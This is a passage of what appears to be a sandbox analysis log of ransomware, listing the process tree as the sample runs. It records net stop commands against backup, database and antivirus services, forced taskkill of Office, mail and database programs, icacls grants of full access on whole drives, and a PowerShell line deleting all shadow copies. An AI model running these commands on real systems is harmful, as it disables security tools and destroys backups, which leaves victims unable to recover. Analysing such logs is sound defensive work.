  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:2884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:2564
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:2876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:2496
- C:\Windows\system32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:2868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:2476
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:2860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:2516
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:2852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:2488
- C:\Windows\system32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:2844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:2536
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:2836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:2448
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:2828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:2364
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:2820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:2408
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:2812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:2540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:4884
- C:\Windows\system32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:2804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:2168
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:2796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:2492
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:2788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:2480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:4124
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:2780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:2344
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:2940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:1768
- C:\Windows\system32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:2772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:1420
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:2764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:1652
- C:\Windows\system32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:2756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:2532
- C:\Windows\system32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:2748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:2484
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:2740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sms_site_sql_backup /y
      4⤵
      PID:2596
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:2288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:2552
- C:\Windows\system32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:2724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:2196
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:2716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:2412
- C:\Windows\system32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:2708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:2436
- C:\Windows\system32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:2700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:2296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:4204
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:2692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:2132
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:2684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:2304
- C:\Windows\system32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:2676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:940
- C:\Windows\system32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:2668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:2316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:2632
- C:\Windows\system32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:2652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:2552
- C:\Windows\system32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:2444
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:3856
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:2620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:792
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:3772
- C:\Windows\system32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:2600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:2128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      PID:3728
- C:\Windows\system32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:2152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:872
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:1716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2216
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:1772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:1356
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:2504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:3116
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:3008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:3728
- C:\Windows\system32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:2100
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:2592
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:2276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:3100
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:1168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:2768
- C:\Windows\system32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:1684
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:948
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:2336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:2528
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:3036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:2720
- C:\Windows\system32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:4896
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:2824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:2604
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:2164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    3⤵
    PID:2592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:2212
- C:\Windows\system32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:2792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Symantec System Recovery” /y
    3⤵
    PID:2244
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:2672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:4140
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:2144
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
    3⤵
    PID:2840
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:2072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMTA /y
    3⤵
    PID:2216
- C:\Windows\system32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:3140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:5300
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:2292
- C:\Windows\system32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:5228
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:3356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:2636
- C:\Windows\system32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:3512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:4304
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:3520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:3984
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:3632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:4888
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:5828
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:3672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:5256
- C:\Windows\system32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:3664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:3704
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:3656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:5524
- C:\Windows\system32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:3648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:5552
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:3640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:5492
- C:\Windows\system32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:3624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:5468
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:3616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:2396
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:3608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:5540
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:3600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:2540
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:3592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:5136
- C:\Windows\system32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:3584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:2504
- C:\Windows\system32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:3576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:5532
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:3568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:3960
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:3560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:5020
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:3552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:3528
- C:\Windows\system32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:3544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:4288
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:3736
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:3816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:2032
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:3808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:2204
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:3800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:2200
- C:\Windows\system32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:3968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    3⤵
    PID:5072
- C:\Windows\system32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:3976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vapiendpoint /y
    3⤵
    PID:3444
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:1632
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:1060
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:1684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:2332
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:1352
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:2332
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:1636
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:2920
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:2348
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:2780
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:2796
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:2804
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:2820
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:2660
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:2668
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:2152
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:2620
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:2856
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:784
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:112
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:2956
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:1512
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:2996
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:1840
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:1728
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:1668
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:628
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:588
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.22
  2⤵
  PID:1504
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:1020
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:1356
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:2860
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:2868
- C:\Windows\system32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:3768
- C:\Windows\system32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3724
- C:\Windows\system32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:2656
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:2600
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:2876
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:2692
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:2884
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:2892
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:2908
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:2916
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:2932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:2748
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:2756
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4092
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:4084
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4076
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4068
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:4060
- C:\Windows\system32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:3896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:2624
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:3888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:5128
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:3784
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:4284
- C:\Windows\system32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:3528
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:3500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:5008
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:3492
- C:\Windows\system32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:3484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:5268
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:3476
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:3468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:5196
- C:\Windows\system32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:3460
- C:\Windows\system32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:3452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:4028
- C:\Windows\system32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:3444
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:3436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:6028
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:3428
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:3420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:5292
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:3412
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:3404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
